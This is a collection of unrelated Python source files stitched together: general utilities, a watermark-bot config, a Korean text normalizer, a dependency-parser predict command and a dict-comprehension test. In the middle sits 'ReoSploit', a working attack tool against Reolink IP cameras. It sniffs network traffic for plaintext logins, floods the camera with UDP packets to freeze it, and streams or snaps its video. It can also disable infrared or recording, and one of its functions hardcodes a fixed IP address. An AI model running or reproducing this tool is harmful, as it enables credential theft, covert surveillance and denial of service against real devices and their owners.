    If value is None and null_empty is True an empty list will be returned; if null_empty
    is False, None will be returned.
Example:
>>> make_list(['list'])
['list']
>>> make_list(('t1', 't2'))
['t1', 't2']
>>> make_list('element')
['element']
>>> make_list(None)
[]
>>> print(make_list(None, null_empty=False))
None
"""
if isinstance(value, list):
return value
if is_iterable_but_no_str(value):
return list(value)
if value is None:
return [] if null_empty else None
return [value]
def interpolate(format_: str, **context: Any) -> str:
"""
Dynamically interpolates a format by using a given context.
Example:
>>> interpolate('{payload}', payload=12)
'12'
>>> interpolate('{payload.upper()}', payload="a")
'A'
>>> interpolate('{(a - b):0.2f}', a=10, b=4.999)
'5.00'
"""
return cast(str, eval(f'f{format_!r}', None, context)) # pylint: disable=eval-used
def interpolate_complex(cplx: Any, **context: Any) -> Any:
"""
f-String interpolates a complex structure (like a dict or list).
Examples:
>>> dut = interpolate_complex
>>> dut("{number}", number=42) # str
'42'
>>> dut(["{one}", "{two}"], one=1, two=2) # list
['1', '2']
>>> dut(("{one}", "{two}"), one=1, two=2) # tuple
['1', '2']
>>> dut({'one': '{one}', '{two}': 'two'}, one=1, two=2) # dict
{'one': '1', '2': 'two'}
>>> dut({'one': '{one}', '{two}': ["{one}", "{two}"]}, one=1, two=2) # complex
{'one': '1', '2': ['1', '2']}
>>> dut(42, one=1, two=2) # none of the above -> as is
42
"""
# pylint: disable=invalid-name
def i(c: Any) -> Any:
if isinstance(c, dict):
return {i(k): i(v) for k, v in c.items()}
if is_iterable_but_no_str(c):
return [i(item) for item in c]
if isinstance(c, str):
return interpolate(c, **context)
return c
# pylint: enable=invalid-name
return i(cplx)
class classproperty(property): # pylint: disable=invalid-name
"""
Decorator classproperty:
Make class methods look like read-only class properties.
Writing to that classproperty will not do what you expect ;-)
Examples:
>>> class Foo(object):
... _instance = 5
... @classproperty
... def my_prop(cls):
... return cls._instance
>>> Foo.my_prop
5
>>> Foo._instance
5
>>> Foo._instance = 15
>>> Foo.my_prop
15
>>> Foo.my_prop = 10
>>> Foo._instance
15
"""
def __get__(self, cls, owner): # type: ignore
return classmethod(self.fget).__get__(None, owner)()
class AutoStrMixin:
"""
Magically adds __str__ and __repr__ methods containing non-ignored fields.
Example:
>>> class Magic(AutoStrMixin):
... __ignore_fields__ = ['c']
... def __init__(self):
... self.a = 42
... self.b = 'abc'
... self.c = 42.42
>>> class MoreMagic(Magic):
... __ignore_fields__ = ['e']
... def __init__(self):
... super().__init__()
... self.d = 'd'
... self.e = 'e'
>>> dut = Magic()
>>> str(dut)
"Magic(a=42, b='abc')"
>>> repr(dut)
"Magic(a=42, b='abc')"
>>> mm = MoreMagic()
>>> str(mm)
"MoreMagic(a=42, b='abc', d='d')"
"""
@classmethod
def __ignore(cls) -> Set[str]:
clz = cls
field_name = '__ignore_fields__'
res: Set[str] = set()
for clazz in inspect.getmro(clz):
values_ = getattr(clazz, field_name, None)
if values_ is not None:
res = res.union(set(cast(Iterable[str], make_list(values_))))
return res
def __str__(self) -> str:
items = [
"{name}={value}".format(
name=name,
value=vars(self)[name].__repr__()
) for name in sorted(vars(self))
if name not in self.__ignore()
]
return "{clazz}({items})".format(
clazz=str(type(self).__name__),
items=', '.join(items)
)
def __repr__(self) -> str:
return str(self)
class LogMixin:
"""
Adds a logger property to the class to provide easy access to a configured logging instance to
use.
Example:
>>> class NeedsLogger(LogMixin):
... def do(self, message):
... self.logger.info(message)
>>> dut = NeedsLogger()
>>> dut.do('mymessage')
"""
@classproperty
def logger(cls: Any) -> logging.Logger: # pylint: disable=no-self-argument
"""
Configures and returns a logger instance for further use.
Returns:
(logging.Logger)
"""
component = "{}.{}".format(cls.__module__, cls.__name__) # pylint: disable=no-member
return logging.getLogger(component)
class Singleton(type):
"""
Metaclass for singleton classes.
Examples:
>>> class Magic(metaclass=Singleton):
... pass
>>> Magic() is Magic()
True
"""
_instances: Dict[type, type] = {}
def __call__(cls, *args: Any, **kwargs: Any) -> type:
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
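# --- Usage sketch (illustrative only, not part of the original module) ---
# Combines the helpers above: a singleton service that gets a readable repr
# from AutoStrMixin and a preconfigured logger from LogMixin.
#
# class Service(AutoStrMixin, LogMixin, metaclass=Singleton):
#     def __init__(self) -> None:
#         self.names = make_list('worker')                   # -> ['worker']
#         self.greeting = interpolate('{name}!', name='hi')  # -> 'hi!'
#
#     def run(self) -> None:
#         self.logger.info("Running %s", self)
#
# assert Service() is Service()  # True, courtesy of the Singleton metaclass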
|
the-stack_106_19125
|
""" This module defines the constants or default values.
"""
from pydantic import BaseModel, validator
from watermark import Position
class Config(BaseModel):
watermark: str = "https://drive.google.com/file/d/1MuBCyPkasHcQ-h-LW4zYaWtAGgGqjQxV/view?usp=sharing"
frame_rate: int = 15
preset: str = "ultrafast"
position: Position = Position.centre
@validator("preset")
def validate_preset(val):
allowed = ["ultrafast", "fast", "medium", "slow"]
        if val not in allowed:
raise ValueError(f"Choose preset from {allowed}")
return val
START = """I am alive!"""
HELP = """
Using the bot is very simple. Just send a photo, video or gif to the bot. The bot will reply with the watermarked media.
The bot commands `/set` and `/get` can set and get the value of the configuration variables. The commands are simple and intuitive. The bot will show you the usage if you send an incorrect argument.
Syntax for `/set` ➜ `/set key: value`
Syntax for `/get` ➜ `/get key`
"""
COMMANDS = {
"start": "start the bot or check if alive",
"set": "set the value for a config variable",
"get": "know the value of a config variable",
"help": "learn how to use the bot",
}
config = Config()
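# --- Validation sketch (illustrative only, not part of the original module) ---
# The validator above restricts `preset`; an unsupported value raises a
# pydantic ValidationError whose message includes the allowed choices, e.g.:
#
# from pydantic import ValidationError
# try:
#     Config(preset="veryslow")
# except ValidationError as err:
#     print(err)  # message contains "Choose preset from ['ultrafast', 'fast', 'medium', 'slow']"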
|
the-stack_106_19128
|
# coding: utf-8
# Code based on
import re
import os
import ast
import json
from jamo import hangul_to_jamo, h2j, j2h
from .ko_dictionary import english_dictionary, etc_dictionary
PAD = '_'
EOS = '~'
PUNC = '!\'(),-.:;?'
SPACE = ' '
JAMO_LEADS = "".join([chr(_) for _ in range(0x1100, 0x1113)])
JAMO_VOWELS = "".join([chr(_) for _ in range(0x1161, 0x1176)])
JAMO_TAILS = "".join([chr(_) for _ in range(0x11A8, 0x11C3)])
VALID_CHARS = JAMO_LEADS + JAMO_VOWELS + JAMO_TAILS + PUNC + SPACE
ALL_SYMBOLS = PAD + EOS + VALID_CHARS
char_to_id = {c: i for i, c in enumerate(ALL_SYMBOLS)}
id_to_char = {i: c for i, c in enumerate(ALL_SYMBOLS)}
quote_checker = """([`"'"“‘])(.+?)([`"'"”’])"""
def is_lead(char):
return char in JAMO_LEADS
def is_vowel(char):
return char in JAMO_VOWELS
def is_tail(char):
return char in JAMO_TAILS
def get_mode(char):
if is_lead(char):
return 0
elif is_vowel(char):
return 1
elif is_tail(char):
return 2
else:
return -1
def _get_text_from_candidates(candidates):
if len(candidates) == 0:
return ""
elif len(candidates) == 1:
return _jamo_char_to_hcj(candidates[0])
else:
return j2h(**dict(zip(["lead", "vowel", "tail"], candidates)))
def jamo_to_korean(text):
text = h2j(text)
idx = 0
new_text = ""
candidates = []
while True:
if idx >= len(text):
new_text += _get_text_from_candidates(candidates)
break
char = text[idx]
mode = get_mode(char)
if mode == 0:
new_text += _get_text_from_candidates(candidates)
candidates = [char]
elif mode == -1:
new_text += _get_text_from_candidates(candidates)
new_text += char
candidates = []
else:
candidates.append(char)
idx += 1
return new_text
num_to_kor = {
'0': '영',
'1': '일',
'2': '이',
'3': '삼',
'4': '사',
'5': '오',
'6': '육',
'7': '칠',
'8': '팔',
'9': '구',
}
unit_to_kor1 = {
'%': '퍼센트',
'cm': '센치미터',
'mm': '밀리미터',
'km': '킬로미터',
'kg': '킬로그람',
}
unit_to_kor2 = {
'm': '미터',
}
upper_to_kor = {
'A': '에이',
'B': '비',
'C': '씨',
'D': '디',
'E': '이',
'F': '에프',
'G': '지',
'H': '에이치',
'I': '아이',
'J': '제이',
'K': '케이',
'L': '엘',
'M': '엠',
'N': '엔',
'O': '오',
'P': '피',
'Q': '큐',
'R': '알',
'S': '에스',
'T': '티',
'U': '유',
'V': '브이',
'W': '더블유',
'X': '엑스',
'Y': '와이',
'Z': '지',
}
def compare_sentence_with_jamo(text1, text2):
return h2j(text1) != h2j(text2)
def tokenize(text, as_id=False):
# jamo package에 있는 hangul_to_jamo를 이용하여 한글 string을 초성/중성/종성으로 나눈다.
text = normalize(text)
tokens = list(hangul_to_jamo(text)) # '존경하는' --> ['ᄌ', 'ᅩ', 'ᆫ', 'ᄀ', 'ᅧ', 'ᆼ', 'ᄒ', 'ᅡ', 'ᄂ', 'ᅳ', 'ᆫ', '~']
if as_id:
return [char_to_id[token] for token in tokens] + [char_to_id[EOS]]
else:
return [token for token in tokens] + [EOS]
def tokenizer_fn(iterator):
return (token for x in iterator for token in tokenize(x, as_id=False))
def normalize(text):
text = text.strip()
text = re.sub('\(\d+일\)', '', text)
text = re.sub('\([⺀-⺙⺛-⻳⼀-⿕々〇〡-〩〸-〺〻㐀-䶵一-鿃豈-鶴侮-頻並-龎]+\)', '', text)
text = normalize_with_dictionary(text, etc_dictionary)
text = normalize_english(text)
text = re.sub('[a-zA-Z]+', normalize_upper, text)
text = normalize_quote(text)
text = normalize_number(text)
return text
def normalize_with_dictionary(text, dic):
if any(key in text for key in dic.keys()):
pattern = re.compile('|'.join(re.escape(key) for key in dic.keys()))
return pattern.sub(lambda x: dic[x.group()], text)
else:
return text
def normalize_english(text):
def fn(m):
word = m.group()
if word in english_dictionary:
return english_dictionary.get(word)
else:
return word
text = re.sub("([A-Za-z]+)", fn, text)
return text
def normalize_upper(text):
text = text.group(0)
if all([char.isupper() for char in text]):
return "".join(upper_to_kor[char] for char in text)
else:
return text
def normalize_quote(text):
def fn(found_text):
        from nltk import sent_tokenize  # NLTK doesn't get along with multiprocessing
found_text = found_text.group()
unquoted_text = found_text[1:-1]
sentences = sent_tokenize(unquoted_text)
return " ".join(["'{}'".format(sent) for sent in sentences])
return re.sub(quote_checker, fn, text)
number_checker = "([+-]?\d[\d,]*)[\.]?\d*"
count_checker = "(시|명|가지|살|마리|포기|송이|수|톨|통|점|개|벌|척|채|다발|그루|자루|줄|켤레|그릇|잔|마디|상자|사람|곡|병|판)"
def normalize_number(text):
text = normalize_with_dictionary(text, unit_to_kor1)
text = normalize_with_dictionary(text, unit_to_kor2)
text = re.sub(number_checker + count_checker,
lambda x: number_to_korean(x, True), text)
text = re.sub(number_checker,
lambda x: number_to_korean(x, False), text)
return text
num_to_kor1 = [""] + list("일이삼사오육칠팔구")
num_to_kor2 = [""] + list("만억조경해")
num_to_kor3 = [""] + list("십백천")
# count_to_kor1 = [""] + ["하나","둘","셋","넷","다섯","여섯","일곱","여덟","아홉"]
count_to_kor1 = [""] + ["한", "두", "세", "네", "다섯", "여섯", "일곱", "여덟", "아홉"]
count_tenth_dict = {
"십": "열",
"두십": "스물",
"세십": "서른",
"네십": "마흔",
"다섯십": "쉰",
"여섯십": "예순",
"일곱십": "일흔",
"여덟십": "여든",
"아홉십": "아흔",
}
def number_to_korean(num_str, is_count=False):
if is_count:
num_str, unit_str = num_str.group(1), num_str.group(2)
else:
num_str, unit_str = num_str.group(), ""
num_str = num_str.replace(',', '')
# print("before ast : ", num_str, "dtype : ",type(num_str))
try:
num = ast.literal_eval(num_str)
# print("After ast :", num,"dtype : ",type(num))
except Exception:
num_str = re.sub('^0+', '', num_str)
num = ast.literal_eval(num_str)
if num == 0:
return "영"
check_float = num_str.split('.')
if len(check_float) == 2:
digit_str, float_str = check_float
elif len(check_float) >= 3:
raise Exception(" [!] Wrong number format")
else:
digit_str, float_str = check_float[0], None
if is_count and float_str is not None:
raise Exception(" [!] `is_count` and float number does not fit each other")
digit = int(digit_str)
if digit_str.startswith("-"):
digit, digit_str = abs(digit), str(abs(digit))
kor = ""
size = len(str(digit))
tmp = []
for i, v in enumerate(digit_str, start=1):
v = int(v)
if v != 0:
if is_count:
tmp += count_to_kor1[v]
else:
tmp += num_to_kor1[v]
tmp += num_to_kor3[(size - i) % 4]
if (size - i) % 4 == 0 and len(tmp) != 0:
kor += "".join(tmp)
tmp = []
try:
kor += num_to_kor2[int((size - i) / 4)]
            except IndexError:
                print(f'IndexError: {digit_str}')
if is_count:
if kor.startswith("한") and len(kor) > 1:
kor = kor[1:]
if any(word in kor for word in count_tenth_dict):
kor = re.sub(
'|'.join(count_tenth_dict.keys()),
lambda x: count_tenth_dict[x.group()], kor)
if not is_count and kor.startswith("일") and len(kor) > 1:
kor = kor[1:]
if float_str is not None:
kor += "쩜 "
kor += re.sub('\d', lambda x: num_to_kor[x.group()], float_str)
if num_str.startswith("+"):
kor = "플러스 " + kor
elif num_str.startswith("-"):
kor = "마이너스 " + kor
return kor + unit_str
if __name__ == "__main__":
def test_normalize(text):
print(text)
print(normalize(text))
print("=" * 30)
test_normalize("JTBC는 JTBCs를 DY는 A가 Absolute")
test_normalize("오늘(13일) 3,600마리 강아지가")
test_normalize("60.3%")
test_normalize('"저돌"(猪突) 입니다.')
test_normalize('비대위원장이 지난 1월 이런 말을 했습니다. “난 그냥 산돼지처럼 돌파하는 스타일이다”')
test_normalize("지금은 -12.35%였고 종류는 5가지와 19가지, 그리고 55가지였다")
test_normalize("JTBC는 TH와 K 양이 2017년 9월 12일 오후 12시에 24살이 된다")
print(list(hangul_to_jamo(list(hangul_to_jamo('비대위원장이 지난 1월 이런 말을 했습니다? “난 그냥 산돼지처럼 돌파하는 스타일이다”')))))
|
the-stack_106_19129
|
# -*- coding: utf-8 -*-
from datetime import datetime
from parser import Model
from parser.cmds.cmd import CMD
from parser.utils.corpus import Corpus
from parser.utils.data import TextDataset, batchify
class Predict(CMD):
def add_subparser(self, name, parser):
subparser = parser.add_parser(
name, help='Use a trained model to make predictions.'
)
subparser.add_argument('--batch-size', default=5000, type=int,
help='batch size')
subparser.add_argument('--fdata', default='data/ptb/test.conllx',
help='path to dataset')
subparser.add_argument('--fpred', default='pred.conllx',
help='path to predicted result')
return subparser
def __call__(self, args):
super(Predict, self).__call__(args)
print("Load the dataset")
corpus = Corpus.load(args.fdata, self.fields)
dataset = TextDataset(corpus, [self.WORD, self.FEAT])
# set the data loader
dataset.loader = batchify(dataset, args.batch_size)
print(f"{len(dataset)} sentences, "
f"{len(dataset.loader)} batches")
print("Load the model")
self.model = Model.load(args.model)
print(f"{self.model}\n")
print("Make predictions on the dataset")
start = datetime.now()
corpus.heads, corpus.rels = self.predict(dataset.loader)
print(f"Save the predicted result to {args.fpred}")
corpus.save(args.fpred)
total_time = datetime.now() - start
print(f"{total_time}s elapsed, "
f"{len(dataset) / total_time.total_seconds():.2f} Sents/s")
|
the-stack_106_19131
|
#!/bin/env python3
import requests
import json
import sys
import os
from colorama import Fore, init, Back, Style
init()
import socket
import random
import netaddr
import pyshark
import argparse
import threading
from queue import Queue
import time
import cv2
from scapy.all import *
from prettytable import PrettyTable, DEFAULT
actionchoices = ['scan', 'listen', 'token', 'enumerate', 'snap', 'dos', 'stream', 'infared', 'recording']
def setargs():
global args
parser = argparse.ArgumentParser(description='Exploit Reolink Cameras.')
parser.add_argument('--ip', help="IP of Target Reolink Camera", type=str)
parser.add_argument('--action', choices=actionchoices, help='''Action to do.''')
parser.add_argument('-u', help="Username to Authenticate on Camera", type=str)
parser.add_argument('-p', help="Password to Authenticate on Camera", type=str)
parser.add_argument('-i', help="Network iFace to use if listening.", type=str)
parser.add_argument('-t', help="Threads to use when needed.", type=int, default=50)
args = parser.parse_args()
if not args.ip or not args.action:
print("Error: Please specify an IP and Action! (E.g, ./reosploit.py --ip 192.168.1.10 --action dos)\n")
x = PrettyTable()
x.field_names = ["Action", "Description", "Category", "Authentication"]
# Enumeration
info(Style.BRIGHT + "Actions For Enumeration." + Style.RESET_ALL)
x.add_row(["Scan", "Discover local Reolink Devices.", "Enumeration", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Listen", "Listen for Reolink Related Network Traffic.", "Enumeration", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Enumerate", "Fully Enumerate information about the device..", "Enumeration", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.align = 'l'; x.set_style(DEFAULT)
print(x, "\n")
# Exploitation
x = PrettyTable()
x.field_names = ["Action", "Description", "Category", "Authentication"]
info(Style.BRIGHT + "Actions For Exploitation." + Style.RESET_ALL)
x.add_row(["Token", "Generate an API Authentication Token using Credentials.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Snap", "Take a Photo through the Camera using the API.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Stream", "Use CV2 + RTSP To Stream the Device's Video Feed", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Dos", "Significantly slow down or freeze the device.", "Exploitation", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Infared", "Toggle the Infared Capabilities.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Recording", "Toggle the Recording Capabilities", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.align = 'l'; x.set_style(DEFAULT)
print(x)
sys.exit()
def info(message):
print(Style.BRIGHT + cyan + '[+] ' + Style.RESET_ALL + message)
def scan():
info("Scanning " + str(len(ips)) + " potential Hosts...")
def probe(ip):
try:
r = requests.get('http://' + str(ip))
if "<title id=appTitle>Reolink</title>" in r.text:
mac = getmacbyip(str(ip))
info("Found Reolink Device: " + str(ip) + " -- " + mac)
else:
pass
except requests.exceptions.ConnectionError:
pass
try:
def threader():
while True:
worker = q.get()
probe(worker)
q.task_done()
q = Queue()
for a in range(args.t):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in ips:
q.put(worker)
q.join()
except Exception as e:
info("Unforseen Error: " + e)
print("")
info("Finished!")
def listen():
if not args.i:
info('If you are listening, please specify a Network iFace to use!')
sys.exit()
info('Listening for Reolink Traffic on ' + args.i + '...')
capture = pyshark.LiveCapture(interface=args.i, use_json=True, display_filter=f"http && ip.dst == {args.ip} or ip.src == {args.ip}")
while True:
for packet in capture.sniff_continuously(packet_count=100):
            # SESSION DECLARATION
try:
username = packet['json'].array.object[0].member[2]
info('Found Active HTTP Session')
print('Client: ' + packet['ip'].dst)
print('User: ' + username)
except KeyError:
pass
except TypeError:
pass
# LOGIN SEQUENCE
try:
if '/api.cgi?cmd=Login' in str(packet.http):
info('Found Login HTTP Request')
username = packet['json'].array.object.member[2].object.member.object.member[0].string
passw = packet['json'].array.object.member[2].object.member.object.member[1].string
print('Client: ' + packet['ip'].src)
print('Login: ' + username + ':' + passw)
except KeyError:
pass
def gettoken(ip):
if not args.u or not args.p:
info('A Username & Password for Authentication is Required for generating a Token!')
sys.exit()
username = args.u
passw = args.p
info("Generating a Token from " + ip + " for " + username + ":" + passw + "...")
r = requests.post("http://" + ip + "/cgi-bin/api.cgi?cmd=Login&token=null", json=[{"cmd":"Login","action":0,"param":{"User":{"userName":username,"password":passw}}}])
try:
token = json.loads(r.text)[0]["value"]["Token"]["name"]
except KeyError:
info('Authentication Error.')
sys.exit()
return token
def numberboolean(number):
if number == 0 or number == 6:
return green + Style.BRIGHT + "Yes" + Fore.RESET + Style.RESET_ALL
else:
return Fore.RED + Style.BRIGHT + "No" + Fore.RESET + Style.RESET_ALL
def enumerate():
info('Getting Token To Authenticate To Fully Enumerate...')
token = gettoken(args.ip)
info('Requesting Information...')
data = [{"cmd":"GetAbility","action":0,"param":{"User":{"userName":args.u}}},{"cmd":"GetNetPort","action":0,"param":{}},{"cmd":"GetDevInfo","action":0,"param":{}},{"cmd":"GetLocalLink","action":0,"param":{}},{"cmd":"GetUser","action":0,"param":{}}]
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?token=" + token, json=data)
jsondata = json.loads(r.content)
info("Getting List Of Users...")
payload = [{"cmd":"GetUser","action":0,"param":{}}]
usersjson = json.loads(requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetUser&token=" + token, json=payload).text)
info("Getting Storage Information...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetHddInfo&token=" + token, json=[{"cmd":"GetHddInfo","action":0,"param":{}}])
hddjson = json.loads(r.content)
info("Successfully Recieved Information!")
print(Style.BRIGHT + """
INFORMATION """ + Fore.BLUE + """[Device: """ + args.ip + """]
""" + Fore.RESET + Style.RESET_ALL)
print("IP: " + args.ip)
print("MAC: " + jsondata[3]["value"]["LocalLink"]["mac"])
print("Name: " + jsondata[2]["value"]["DevInfo"]["name"])
print("Model: " + jsondata[2]["value"]["DevInfo"]["model"])
print("Firmware: " + jsondata[2]["value"]["DevInfo"]["firmVer"])
print(Style.BRIGHT + """
PRIVELEGE CHECK """ + Fore.BLUE + """[User: """ + args.u + """]
""" + Style.RESET_ALL + Fore.RESET)
print("Can Use WiFi? " + numberboolean(jsondata[0]["value"]["Ability"]["wifi"]["permit"]))
print("Can Take Recordings? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["videoClip"]["permit"]))
print("Can Take Photos? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["snap"]["permit"]))
print("Can Download Recordings? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["recDownload"]["permit"]))
print("Can Modify/View FTP Options? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["ftp"]["permit"]))
print("Can Modify/View EMail Options? " + numberboolean(jsondata[0]["value"]["Ability"]["email"]["permit"]))
print("Can Stream from RTSP? " + numberboolean(jsondata[0]["value"]["Ability"]["rtsp"]["permit"]))
print("Can Stream from RTMP? " + numberboolean(jsondata[0]["value"]["Ability"]["rtmp"]["permit"]))
print("Can Reboot? " + numberboolean(jsondata[0]["value"]["Ability"]["reboot"]["permit"]))
print(Style.BRIGHT + """
REGISTERED USERS """ + Fore.BLUE + """[Visible To: """ + args.u + """]
""" + Fore.RESET + Style.RESET_ALL)
for user in usersjson[0]["value"]["User"]:
print("Username: " + user["userName"])
print("Privelege Level: " + user["level"])
print(Style.BRIGHT + """
STORAGE INFORMATION """ + Fore.BLUE + """[Visible To: """ + args.u + """]
""" + Fore.RESET + Style.RESET_ALL)
for hdd in hddjson[0]["value"]["HddInfo"]:
print("Mount: " + str(hdd["mount"]))
print("Capacity: " + str(hdd["capacity"] / 1000) + "GB")
print("Used Storage: " + str(hdd["size"] / 1000) + "GB")
print("\n")
def snap():
info('Getting Token To Authenticate To Get Snapshot...')
token = gettoken(args.ip)
info('Requesting photo...')
r = requests.get('http://' + args.ip + '/cgi-bin/api.cgi?cmd=Snap&channel=0&token=' + token)
if r.status_code == 200:
info('Successfully Snapped a Photo!')
with open('/tmp/snap.jpg', 'wb') as o:
o.write(r.content)
o.close()
info('Photo saved to /tmp/snap.jpg')
else:
info('Unknown Status Code, presuming the Snapshot failed...')
def dos():
print(Style.BRIGHT + Fore.YELLOW + "WARNING:" + Style.RESET_ALL + " THIS ATTACK WILL SLOW DOWN THE CAMERA AND BE VERY OBVIOUS, PLEASE TAKE CAUTION!")
info("Preparing for DOS...")
ip = args.ip
ports = [80, 443, 554]
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#info("Making Bogus Data...")
bogusdata = random._urandom(64900)
info("Starting DOS In 5 Seconds...")
time.sleep(5)
print("")
info("Starting DOS...")
print("Press CNTRL + C At Anytime to Stop the Attack.")
try:
def dosprint():
while True:
dots = 4
for dotcount in range(dots):
print("\r DOSing " + ip + " [-]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [\]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [|]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [/]", end='', flush=True)
time.sleep(0.3)
ta = threading.Thread(target=dosprint)
ta.daemon = True
ta.start()
def senddos(port):
while True:
s.sendto(bogusdata, (ip,port))
def threader():
while True:
worker = q.get()
senddos(worker)
q.task_done()
q = Queue()
for a in range(args.t):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in ports:
q.put(worker)
q.join()
except KeyboardInterrupt:
print("")
info("Stopping...")
sys.exit()
def stream():
if not args.u or not args.p:
info('A Username & Password for Authentication is Required for Streaming Video!')
sys.exit()
info("Attempting to Stream Through RTSP...")
print("Press CNTRL + C At Anytime to Stop the Stream.")
cap = cv2.VideoCapture(f"rtsp://{args.u}:{args.p}@{args.ip}")
try:
while(cap.isOpened()):
ret, frame = cap.read()
frame = cv2.resize(frame, (900, 900))
cv2.imshow(f'ReoSploit Stream @ {args.ip}', frame)
if cv2.waitKey(20) & 0xFF == ord('q'):
break
except KeyboardInterrupt:
pass
cap.release()
cv2.destroyAllWindows()
def infared():
info('Getting Token To Authenticate To Toggle Infared...')
token = gettoken(args.ip)
info("Getting Infared State...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetIrLights&token=" + token, json=[{"cmd":"GetIrLights","action":0,"param":{"channel":0}}])
state = json.loads(r.text)[0]["value"]["IrLights"]["state"]
if state == "Auto":
info("IR Lights are ON. Turning Off...")
action = "Off"
elif state == "Off":
info("IR Lights are OFF. Turning On...")
action = "Auto"
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?token=" + token, json=[{"cmd":"SetIrLights","param":{"IrLights":{"channel":0,"state":action}},"action":0}])
if json.loads(r.text)[0]["value"]["rspCode"] == 200:
info("Successfully Changed the IR Light Options!")
else:
info("Failed. Error Code:", json.loads(r.text)[0]["value"]["rspCode"])
sys.exit()
def recording():
info('Getting Token To Authenticate To Toggle Recording...')
token = gettoken(args.ip)
info("Getting Recording State...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetRec&token=" + token, json=[{"cmd":"GetRec","action":0,"param":{"channel":0}}])
state = json.loads(r.text)[0]["value"]["Rec"]["schedule"]["enable"]
if state == 1:
info("Recording is ON. Turning Off...")
action = 0
elif state == 0:
info("Recording is OFF. Turning On...")
action = 1
r = requests.post(" http://192.168.1.120/cgi-bin/api.cgi?cmd=SetRec&token=" + token, json=[{"cmd":"SetRec","action":0,"param":{"Rec":{"schedule":{"enable":action}}}}])
if json.loads(r.text)[0]["value"]["rspCode"] == 200:
info("Successfully Changed the Recording Options!")
else:
info("Failed. Error Code:", json.loads(r.text)[0]["value"]["rspCode"])
sys.exit()
if os.geteuid() != 0:
info('Please run this as ROOT!')
sys.exit()
def clear():
os.system('clear')
clear()
green = '\u001b[38;5;118m'
yellow = '\u001b[38;5;220m'
cyan = '\u001b[38;5;51m'
banner = fr'''
{Style.BRIGHT}{Fore.BLUE}██████╗ ███████╗ ██████╗ {Fore.RED}███████╗██████╗ ██╗ ██████╗ ██╗████████╗
{Fore.BLUE}██╔══██╗██╔════╝██╔═══██╗{Fore.RED}██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
{Fore.BLUE}██████╔╝█████╗ ██║ ██║{Fore.RED}███████╗██████╔╝██║ ██║ ██║██║ ██║
{Fore.BLUE}██╔══██╗██╔══╝ ██║ ██║{Fore.RED}╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
{Fore.BLUE}██║ ██║███████╗╚██████╔╝{Fore.RED}███████║██║ ███████╗╚██████╔╝██║ ██║
{Fore.BLUE}╚═╝ ╚═╝╚══════╝ ╚═════╝ {Fore.RED}╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ {Fore.RESET}
-+ {yellow}Reosploit v1.2.0{Fore.RESET} +-
--==[ {Fore.RED}{str(len(actionchoices))} Actions Loaded{Fore.RESET} ]==--
--==[ {green}@SpicySoulsv{Fore.RESET} ]==--
--==[ {cyan}Beyond Root Sec{Fore.RESET} ]==--
{Style.RESET_ALL}'''
print(banner)
setargs()
if args.action == "scan":
if "/" in args.ip:
pass
else:
info("Please use an IP Range! E.g: 192.168.1.0/24")
sys.exit()
try:
ips = list(netaddr.IPNetwork(args.ip).iter_hosts())
except:
info("Please use an IP Range! E.g: 192.168.1.0/24")
sys.exit()
else:
if "/" in args.ip:
info("Please use a single IP! E.g: 192.168.1.1")
sys.exit()
try:
if args.action == 'scan':
scan()
elif args.action == 'listen':
listen()
elif args.action == 'token':
token = gettoken(args.ip)
info('Token Generated Successfully.')
print("Camera: " + args.ip)
print("Authentication: " + args.u + ":" + args.p)
print("Token: " + token)
elif args.action == 'enumerate':
enumerate()
elif args.action == 'snap':
snap()
elif args.action == 'dos':
dos()
elif args.action == 'stream':
stream()
elif args.action == 'infared':
infared()
elif args.action == 'recording':
recording()
except KeyboardInterrupt:
print("\nQuitting...")
sys.exit()
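# --- Usage sketch (illustrative only; IPs and credentials are placeholders) ---
# The script checks for root, so run it with sudo:
#   sudo ./reosploit.py --ip 192.168.1.0/24 --action scan
#   sudo ./reosploit.py --ip 192.168.1.10 --action enumerate -u admin -p password
#   sudo ./reosploit.py --ip 192.168.1.10 --action stream -u admin -p password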
|
the-stack_106_19132
|
import unittest
from test import test_support as support
# For scope testing.
g = "Global variable"
class DictComprehensionTest(unittest.TestCase):
def test_basics(self):
expected = {0: 10, 1: 11, 2: 12, 3: 13, 4: 14, 5: 15, 6: 16, 7: 17,
8: 18, 9: 19}
actual = {k: k + 10 for k in range(10)}
self.assertEqual(actual, expected)
expected = {0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}
actual = {k: v for k in range(10) for v in range(10) if k == v}
self.assertEqual(actual, expected)
def test_scope_isolation(self):
k = "Local Variable"
expected = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None,
